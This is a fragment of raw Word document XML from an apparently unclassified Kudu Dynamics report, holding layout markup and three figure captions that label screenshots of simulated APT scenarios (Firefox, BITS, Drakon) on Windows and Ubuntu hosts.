        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E509B4" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BF02659" wp14:editId="3FE75208">
            <wp:extent cx="5642043" cy="56067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5.2 Windows 2 Firefox BITS Micro APT.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5642289" cy="5606946"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1F3764" w14:textId="13135961" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: TA52 Windows 2 Firefox BITS Micro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5689CB22" w14:textId="0FCE79B1" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEFEFCE" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699512B4" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CB1C028" wp14:editId="4F9EB473">
            <wp:extent cx="6293796" cy="542798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5.2 Windows 2 Firefox Drakon APT Sysinfo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6294666" cy="5428734"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E70860F" w14:textId="07578011" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: TA52 Firefox Drakon APT Sysinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B46A8" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AD39A9" wp14:editId="2185F3BE">
            <wp:extent cx="6173626" cy="45622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52 Ubuntu 1 Firefox Drakon APT.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6174237" cy="4562723"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690BDE9" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3A828D" w14:textId="373528D7" w:rsidR="00821808" w:rsidRPr="00FC027E" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: TA52 Ubuntu 1 Firefox Drakon APT</w:t>
      </w:r>
      <w:r w:rsidR="00821808">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00821808">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figure" </w:instrText>
      </w:r>
      <w:r w:rsidR="00821808">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00821808" w:rsidRPr="00FC027E" w:rsidSect="000112F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7D8DE" w14:textId="77777777" w:rsidR="003A6F0D" w:rsidRDefault="003A6F0D" w:rsidP="004D40AC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3262BE4C" w14:textId="77777777" w:rsidR="003A6F0D" w:rsidRDefault="003A6F0D" w:rsidP="004D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ED6F" w14:textId="77777777" w:rsidR="00AA267E" w:rsidRDefault="00AA267E" w:rsidP="006C30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FB35D" w14:textId="77777777" w:rsidR="00AA267E" w:rsidRDefault="00AA267E" w:rsidP="006C30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1E88" w14:textId="77777777" w:rsidR="00AA267E" w:rsidRDefault="00AA267E" w:rsidP="006C3099">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="360"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:tab/>
      <w:t>UNCLASSIFIED</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60CBE" w14:textId="77777777" w:rsidR="00AA267E" w:rsidRDefault="00AA267E" w:rsidP="006C30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31D7">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>4</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="5ED7D958" w14:textId="77777777" w:rsidR="00AA267E" w:rsidRDefault="00AA267E" w:rsidP="004D40AC">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="360"/>
    </w:pPr>
    <w:r>
      <w:t>Kudu Dynamics</w:t>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
  </w:p>
  <w:p w14:paraId="0E839AA3" w14:textId="19B9ED32" w:rsidR="00AA267E" w:rsidRDefault="00AA267E" w:rsidP="004D40AC">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="360"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w: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B2F46" w14:textId="77777777" w:rsidR="003A6F0D" w:rsidRDefault="003A6F0D" w:rsidP="004D40AC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4540E6BF" w14:textId="77777777" w:rsidR="003A6F0D" w:rsidRDefault="003A6F0D" w:rsidP="004D4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CF4F" w14:textId="77777777" w:rsidR="00AA267E" w:rsidRDefault="00AA267E" w:rsidP="006C3099">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t>UNCLASSIFI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98BD1" w14:textId="77777777" w:rsidR="00AA267E" w:rsidRDefault="00AA267E" w:rsidP="006C3099">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w: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AF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF264784"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6912" w:hanging="432"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading2"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7056" w:hanging="576"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading3"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi" w:hint="default"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading4"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7344" w:hanging="864"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading5"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7488" w:hanging="1008"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading6"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7632" w:hanging="1152"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading7"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7776" w:hanging="1296"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading8"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7920" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading9"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8064" w:hanging="1584"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="023145EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="636EF1D2"/>
    <w:lvl w:ilvl="0" w:tplc="A78073B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Appendix"/>
      <w:lvlText w:val="Appendix B-%1."/>
      <w:lvlJc w:val="center"/>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7487B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE5ED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ED1A27"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B2E5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8A0F72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="73EA4A5A"/>
    <w:lvl w:ilvl="0" w:tplc="72F45762">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53242"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7AF8D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AE4B44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="535E8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07288E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F741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BF41B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="152A4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584169"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="38244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B60DFA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7B08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420819"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B36E0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9A714D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F230C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9B0FB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBCE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535379"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="127A2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7F0D3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB261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BE6A5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3312A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FE014E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BD20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2362FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="28B4E066"/>
    <w:lvl w:ilvl="0" w:tplc="72F45762">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A30C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05443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EE2414"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="784A4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A61EA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E389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EE6544"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4314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64C80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0018F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625329"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C22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75B80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1660A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362C73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF403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8601EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64687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0D0BAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99BC5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78B5462"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBBC2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F231DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53DC8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FD4C64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCD80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AB531D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B156A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4"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="1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0AC"/>
    <w:rsid w:val="00005FC6"/>
    <w:rsid w:val="000112FB"/>
    <w:rsid w:val="000755DE"/>
    <w:rsid w:val="000768E7"/>
    <w:rsid w:val="000C59A4"/>
    <w:rsid w:val="000E4F27"/>
    <w:rsid w:val="000E52B4"/>
    <w:rsid w:val="001267DA"/>
    <w:rsid w:val="00141067"/>
    <w:rsid w:val="00145513"/>
    <w:rsid w:val="00147BFC"/>
    <w:rsid w:val="001967C0"/>
    <w:rsid w:val="001C08FA"/>
    <w:rsid w:val="001F377A"/>
    <w:rsid w:val="002376DB"/>
    <w:rsid w:val="00240805"/>
    <w:rsid w:val="0024116E"/>
    <w:rsid w:val="00261EA4"/>
    <w:rsid w:val="002911C2"/>
    <w:rsid w:val="002A0BAC"/>
    <w:rsid w:val="002E324C"/>
    <w:rsid w:val="00316CA4"/>
    <w:rsid w:val="00317DE0"/>
    <w:rsid w:val="00347934"/>
    <w:rsid w:val="00355486"/>
    <w:rsid w:val="00365694"/>
    <w:rsid w:val="003A6F0D"/>
    <w:rsid w:val="003B53F3"/>
    <w:rsid w:val="00412D55"/>
    <w:rsid w:val="004246F7"/>
    <w:rsid w:val="00424728"/>
    <w:rsid w:val="00471B75"/>
    <w:rsid w:val="004737C8"/>
    <w:rsid w:val="00492BEB"/>
    <w:rsid w:val="004C28E0"/>
    <w:rsid w:val="004D064E"/>
    <w:rsid w:val="004D3CDA"/>
    <w:rsid w:val="004D40AC"/>
    <w:rsid w:val="004D7554"/>
    <w:rsid w:val="00526748"/>
    <w:rsid w:val="005431D7"/>
    <w:rsid w:val="00595032"/>
    <w:rsid w:val="005A0BE6"/>
    <w:rsid w:val="005B2261"/>
    <w:rsid w:val="005E53BB"/>
    <w:rsid w:val="005F68B4"/>
    <w:rsid w:val="00650FDF"/>
    <w:rsid w:val="006C14C7"/>
    <w:rsid w:val="006C1F33"/>
    <w:rsid w:val="006C3099"/>
    <w:rsid w:val="006F02EE"/>
    <w:rsid w:val="00720419"/>
    <w:rsid w:val="007508CA"/>
    <w:rsid w:val="00770E99"/>
    <w:rsid w:val="00781848"/>
    <w:rsid w:val="00790BCE"/>
    <w:rsid w:val="00795BC9"/>
    <w:rsid w:val="007B47CA"/>
    <w:rsid w:val="007E1289"/>
    <w:rsid w:val="00821808"/>
    <w:rsid w:val="00835B56"/>
    <w:rsid w:val="008B5E34"/>
    <w:rsid w:val="008C7F35"/>
    <w:rsid w:val="009207BF"/>
    <w:rsid w:val="00965965"/>
    <w:rsid w:val="0097593C"/>
    <w:rsid w:val="009B5E2C"/>
    <w:rsid w:val="009D2B90"/>
    <w:rsid w:val="00A351B2"/>
    <w:rsid w:val="00A51B29"/>
    <w:rsid w:val="00A54149"/>
    <w:rsid w:val="00A62E26"/>
    <w:rsid w:val="00A7276C"/>
    <w:rsid w:val="00AA267E"/>
    <w:rsid w:val="00AB593D"/>
    <w:rsid w:val="00AF4E37"/>
    <w:rsid w:val="00AF5C17"/>
    <w:rsid w:val="00B154B0"/>
    <w:rsid w:val="00B31596"/>
    <w:rsid w:val="00B51870"/>
    <w:rsid w:val="00B87C44"/>
    <w:rsid w:val="00BA5AEF"/>
    <w:rsid w:val="00C83177"/>
    <w:rsid w:val="00CE2C66"/>
    <w:rsid w:val="00D20BD7"/>
    <w:rsid w:val="00D31398"/>
    <w:rsid w:val="00D5795A"/>
    <w:rsid w:val="00D6781E"/>
    <w:rsid w:val="00D76EAD"/>
    <w:rsid w:val="00D84E00"/>
    <w:rsid w:val="00DC723B"/>
    <w:rsid w:val="00DE06E6"/>
    <w:rsid w:val="00DE43D3"/>
    <w:rsid w:val="00E002EA"/>
    <w:rsid w:val="00E12CFC"/>
    <w:rsid w:val="00E4482B"/>
    <w:rsid w:val="00E60161"/>
    <w:rsid w:val="00E97B0E"/>
    <w:rsid w:val="00ED047C"/>
    <w:rsid w:val="00ED32B6"/>
    <w:rsid w:val="00EF66AF"/>
    <w:rsid w:val="00F11F66"/>
    <w:rsid w:val="00F32A55"/>
    <w:rsid w:val="00F85BE1"/>
    <w:rsid w:val="00FA18DA"/>
    <w:rsid w:val="00FC027E"/>
    <w:rsid w:val="00FE4530"/>
    <w:rsid w:val="00FE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E2998"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7F85C247-A59C-B843-A3EA-4A272A78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748"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:qFormat/>
    <w:rsid w:val="00DC723B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="480"/>
      <w:ind w:left="432"/>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4D40AC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200"/>
      <w:ind w:left="576"/>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4D40AC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200"/>
      <w:ind w:left="72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4D40AC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>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4D40AC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="40"/>
      <w:ind w:left="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4D40AC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
